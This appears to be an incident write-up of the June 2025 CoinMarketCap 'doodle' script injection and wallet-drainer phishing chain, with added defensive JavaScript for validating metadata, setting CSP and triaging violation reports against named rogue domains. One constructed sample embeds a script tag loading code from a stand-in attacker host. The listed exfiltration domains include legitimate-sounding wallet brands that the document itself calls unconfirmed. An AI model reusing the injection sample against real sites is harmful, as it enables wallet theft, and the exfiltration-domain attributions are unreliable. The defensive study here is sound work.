
On June 20, 2025, CoinMarketCap (CMC)—a trusted name in the crypto ecosystem—fell victim to a highly coordinated client-side attack that weaponized a seemingly harmless “doodle” graphic to deliver malware through its own frontend infrastructure.
Visitors to CMC’s homepage were greeted with a fake popup, styled impeccably to match the site’s branding, urging them to “verify their wallets.” This social engineering lure, when acted upon, enabled wallet-draining scripts to interact with MetaMask, Phantom, and other popular wallets.
“The popups were not part of CMC’s legitimate features—they were the result of a client-side attack that hijacked the website’s frontend.”
Technical Breakdown: A Five-Stage Phishing Chain
“CoinMarketCap is hacked… you will get drained!” pic.twitter.com/cwSFQ0M0rg
— Dark Web Informer – Cyber Threat Intelligence (@DarkWebInformer) June 20, 2025
1. Initial Compromise: The Doodle Trap
An API request from CMC’s frontend (/doodle/get) fetched a JSON file that referenced a remote domain:
https://static.cdnkit[.]io/cmc/6855a83d80876056dab0a5cf.json
This file—masquerading as image metadata—included embedded JavaScript.
2. JavaScript Injection and Execution
The embedded code:
- Altered the DOM to hide real CMC elements
- Injected a script from blockassets[.]app
- Set a browser flag (window.cmcInjected) to ensure single execution
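The root of stages 1 and 2 is that image metadata fetched from /doodle/get was trusted enough to carry a remote-domain reference and embedded script into the page. The following is an added example, not CoinMarketCap's code: it validates a doodle record against an allowlisted asset origin and an expected set of fields before anything is rendered, and builds a Content-Security-Policy header so that a script referenced from an unlisted domain is blocked even if validation were bypassed. The first-party origin, the field names, the /csp-report endpoint and the three sample payloads are assumptions constructed for the demo.

```javascript
// Added example, not CoinMarketCap's code. Validates a "doodle" record before
// the frontend renders it and builds the CSP header that would stop a smuggled
// script from loading even if validation were bypassed. The asset origin, the
// field names, the report endpoint and the sample payloads are assumptions.

// Hypothetical first-party origin that doodle images are expected to come from.
const ALLOWED_ASSET_ORIGINS = new Set(['https://s2.coinmarketcap.com']);

// Fields a legitimate doodle record may carry; any other key is rejected outright.
const ALLOWED_KEYS = new Set(['id', 'imageUrl', 'altText', 'linkUrl']);

// Markers of script content that have no business in image metadata.
const SCRIPT_PATTERNS = [
  /<\s*script/i,                 // inline <script> tag
  /javascript\s*:/i,             // javascript: URL scheme
  /\bon[a-z]+\s*=/i,             // inline event handler attribute (onerror=, onload=)
  /<\s*(iframe|object|embed)/i,  // other tags that can load active content
];

function containsScript(value) {
  return SCRIPT_PATTERNS.some((re) => re.test(value));
}

function parseHttpsUrl(value) {
  try {
    const url = new URL(value);
    return url.protocol === 'https:' ? url : null;
  } catch {
    return null;
  }
}

// Returns { ok: true, doodle } for a clean record, or { ok: false, reason }.
function validateDoodle(payload) {
  if (typeof payload !== 'object' || payload === null || Array.isArray(payload)) {
    return { ok: false, reason: 'payload is not an object' };
  }
  for (const [key, value] of Object.entries(payload)) {
    if (!ALLOWED_KEYS.has(key)) return { ok: false, reason: `unexpected key: ${key}` };
    if (typeof value !== 'string') return { ok: false, reason: `${key} is not a string` };
    if (containsScript(value)) return { ok: false, reason: `${key} contains script content` };
  }
  const image = parseHttpsUrl(payload.imageUrl);
  if (!image || !ALLOWED_ASSET_ORIGINS.has(image.origin)) {
    return { ok: false, reason: 'imageUrl points outside the asset allowlist' };
  }
  if ('linkUrl' in payload && !parseHttpsUrl(payload.linkUrl)) {
    return { ok: false, reason: 'linkUrl is not an https URL' };
  }
  return { ok: true, doodle: { ...payload } };
}

// Defence in depth: scripts may only run from the site itself, images may only
// load from the allowlisted origins, and anything blocked is reported.
function buildContentSecurityPolicy() {
  const imgSources = ["'self'", ...ALLOWED_ASSET_ORIGINS].join(' ');
  return [
    "default-src 'self'",
    "script-src 'self'",
    `img-src ${imgSources}`,
    "object-src 'none'",
    "base-uri 'self'",
    'report-uri /csp-report', // hypothetical report endpoint
  ].join('; ');
}

// Constructed samples: a clean record, one shaped like the hijacked response
// described above (remote origin plus embedded script), and one that only
// points off-origin without any script.
const BENIGN_DOODLE = {
  id: 'summer-2025',
  imageUrl: 'https://s2.coinmarketcap.com/static/doodles/summer.png',
  altText: 'Summer doodle',
};
const HIJACKED_DOODLE = {
  id: 'doodle-hijacked',
  imageUrl: 'https://attacker-cdn.example/cmc/doodle.png',
  altText: '<script src="https://attacker-cdn.example/inject.js"></script>',
};
const OFF_ORIGIN_DOODLE = {
  id: 'doodle-off-origin',
  imageUrl: 'https://attacker-cdn.example/cmc/doodle.png',
  altText: 'plain text',
};

for (const [name, d] of Object.entries({ BENIGN_DOODLE, HIJACKED_DOODLE, OFF_ORIGIN_DOODLE })) {
  console.log(name, validateDoodle(d));
}
console.log(buildContentSecurityPolicy());
```

When the record passes, render it by assigning `img.src` and `img.alt` through DOM properties rather than `innerHTML`; the validator keeps script out of the data, and the CSP keeps a script from an unlisted origin from executing even if the data path is ever bypassed.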
3. Fake Wallet Popup Deployment
The injected popup mimicked CMC UI and urged users to connect their wallets. Clicking the button triggered wallet access requests and phishing logic that adapted to different wallets.
4. Malicious Infrastructure
The attack relied on multiple rogue domains:
- cdnkit[.]io – initial JSON payload
- blockassets[.]app – main phishing scripts
- walletconnect[.]com, trustwallet[.]com – data exfiltration
WHOIS records show that these domains are not owned by CMC and have ties to past scam infrastructure.
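The rogue domains above are the most directly actionable detection artefacts in this chain: a site serving a Content-Security-Policy with a report endpoint receives a JSON violation report each time a browser blocks a resource, and those reports can be matched against the domains. The following is an added example, not CoinMarketCap's tooling, that triages such reports; the report shape follows the browser's report-uri JSON format, the sample report lines are constructed, and the two exfiltration hosts are deliberately left out of the match list because their names collide with legitimate wallet brands and would need confirmation before being treated as indicators.

```javascript
// Added example, not CoinMarketCap's tooling. Triages Content-Security-Policy
// violation reports (the JSON a browser POSTs to a report-uri endpoint) and
// raises an alert when the blocked resource lives on one of the domains the
// write-up attributes to the attacker. The report lines below are constructed.

// Domains named in the write-up, undefanged so they can be matched. The two
// exfiltration hosts are left out: their names collide with legitimate wallet
// brands and need confirmation before being used as indicators.
const ROGUE_DOMAINS = ['cdnkit.io', 'blockassets.app'];

// Match the exact domain or any subdomain (static.cdnkit.io -> cdnkit.io).
function matchRogueDomain(hostname) {
  return ROGUE_DOMAINS.find((d) => hostname === d || hostname.endsWith('.' + d)) || null;
}

function hostnameOf(uri) {
  try {
    return new URL(uri).hostname.toLowerCase();
  } catch {
    return null; // CSP reports may carry 'inline', 'eval' or a bare scheme here
  }
}

// rawReports: array of JSON strings, one report per line.
// Returns one alert per report whose blocked-uri resolves to a rogue domain.
function triageCspReports(rawReports) {
  const alerts = [];
  for (const raw of rawReports) {
    let body;
    try {
      body = JSON.parse(raw)['csp-report'];
    } catch {
      continue; // malformed line: skip it rather than abort the batch
    }
    if (!body) continue;
    const host = hostnameOf(body['blocked-uri']);
    const ioc = host ? matchRogueDomain(host) : null;
    if (ioc) {
      alerts.push({
        ioc,
        host,
        directive: body['violated-directive'],
        page: body['document-uri'],
      });
    }
  }
  return alerts;
}

// Constructed sample reports: a blocked third-party image on a harmless host,
// a blocked script from a rogue host, an inline violation with no URL, and a
// malformed line.
const SAMPLE_REPORTS = [
  '{"csp-report":{"document-uri":"https://example.test/","violated-directive":"img-src","blocked-uri":"https://images.example/logo.png"}}',
  '{"csp-report":{"document-uri":"https://example.test/","violated-directive":"script-src","blocked-uri":"https://static.cdnkit.io/cmc/sample.js"}}',
  '{"csp-report":{"document-uri":"https://example.test/","violated-directive":"script-src","blocked-uri":"inline"}}',
  'not json at all',
];

console.log(triageCspReports(SAMPLE_REPORTS));
```

A script-src violation pointing at an unfamiliar CDN is worth an alert on its own; matching against the named domains simply gives the alert a confirmed attribution. The same matcher works over proxy or DNS logs if the field extraction is swapped for the relevant column.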
5. Drainer Payload Activation
The script tricked users into signing token transfers, displaying fake error messages like “Your wallet is blacklisted” or “For security reasons we can’t allow you to connect an empty wallet.”
Screenshots from the attacker’s leaked control panel on Telegram (via “CommLeaks”) confirmed use of the Inferno Drainer malware and showed:
- 110 victims
- Total stolen: ~$43,266
- Dozens of active drainer scripts loaded per session